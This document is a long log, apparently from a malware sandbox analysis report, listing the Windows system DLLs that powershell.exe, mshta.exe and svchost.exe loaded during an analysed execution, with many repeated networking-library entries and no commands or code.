Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: imgutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
